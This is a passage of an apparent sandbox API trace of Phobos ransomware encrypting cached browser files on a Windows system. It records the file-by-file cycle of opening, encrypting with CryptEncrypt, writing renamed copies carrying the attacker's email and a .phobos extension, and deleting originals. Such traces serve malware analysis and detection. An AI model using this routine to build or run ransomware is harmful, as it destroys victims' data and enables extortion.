files\\low\\content.ie5\\ikqeepzr\\player[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.719] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.719] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.720] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0184.720] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.720] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6b6d, lpOverlapped=0x0) returned 1 [0184.751] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6b70, dwBufLen=0x6b70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6b70) returned 1 [0184.751] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6b70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6b70, lpOverlapped=0x0) returned 1 [0184.752] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0184.752] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.752] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.753] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.753] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.753] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.753] CloseHandle (hObject=0x140) returned 1 [0184.753] CloseHandle (hObject=0x14c) returned 1 [0184.753] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[1].js")) returned 1 [0184.754] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\tecjslog[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\tecjslog[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.754] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=103) returned 1 [0184.754] CloseHandle (hObject=0x14c) returned 1 [0184.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\tecjslog[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\tecjslog[1].png")) returned 0x2020 [0184.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\tecjslog[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\tecjslog[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\tecjslog[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\tecjslog[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.755] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.755] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\tecjslog[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\tecjslog[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0184.755] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.755] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x67, lpOverlapped=0x0) returned 1 [0184.885] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0184.885] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x70, lpOverlapped=0x0) returned 1 [0184.885] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0184.885] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.886] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.886] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.886] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.886] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.886] CloseHandle (hObject=0x14c) returned 1 [0184.886] CloseHandle (hObject=0x140) returned 1 [0184.886] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\tecjslog[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\tecjslog[1].png")) returned 1 [0184.887] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\th[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\th[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.887] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2321) returned 1 [0184.888] CloseHandle (hObject=0x140) returned 1 [0184.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\th[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\th[1].jpg")) returned 0x2020 [0184.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\th[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\th[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\th[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\th[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.888] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.888] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\th[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\th[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.889] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0184.889] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.889] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x911, lpOverlapped=0x0) returned 1 [0184.931] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x920, dwBufLen=0x920 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x920) returned 1 [0184.931] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x920, lpOverlapped=0x0) returned 1 [0184.932] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0184.932] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.932] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.932] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.932] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.932] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.932] CloseHandle (hObject=0x140) returned 1 [0184.932] CloseHandle (hObject=0x14c) returned 1 [0184.932] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\th[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\th[1].jpg")) returned 1 [0184.933] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.934] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32638) returned 1 [0184.934] CloseHandle (hObject=0x14c) returned 1 [0184.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg")) returned 0x2020 [0184.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.934] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.935] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.935] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0184.935] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.935] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7f7e, lpOverlapped=0x0) returned 1 [0185.141] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7f80, dwBufLen=0x7f80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7f80) returned 1 [0185.141] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7f80, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7f80, lpOverlapped=0x0) returned 1 [0185.143] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0185.143] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.143] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80, dwBufLen=0x80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80) returned 1 [0185.143] CryptDestroyKey (hKey=0xa328a8) returned 1 [0185.143] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x132, lpOverlapped=0x0) returned 1 [0185.143] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.143] CloseHandle (hObject=0x14c) returned 1 [0185.143] CloseHandle (hObject=0x140) returned 1 [0185.143] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg")) returned 1 [0185.145] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0185.146] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=749) returned 1 [0185.146] CloseHandle (hObject=0x140) returned 1 [0185.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png")) returned 0x2020 [0185.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0185.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.147] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0185.147] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.147] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2ed, lpOverlapped=0x0) returned 1 [0185.154] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f0, dwBufLen=0x2f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f0) returned 1 [0185.154] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2f0, lpOverlapped=0x0) returned 1 [0185.155] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0185.155] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.155] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, 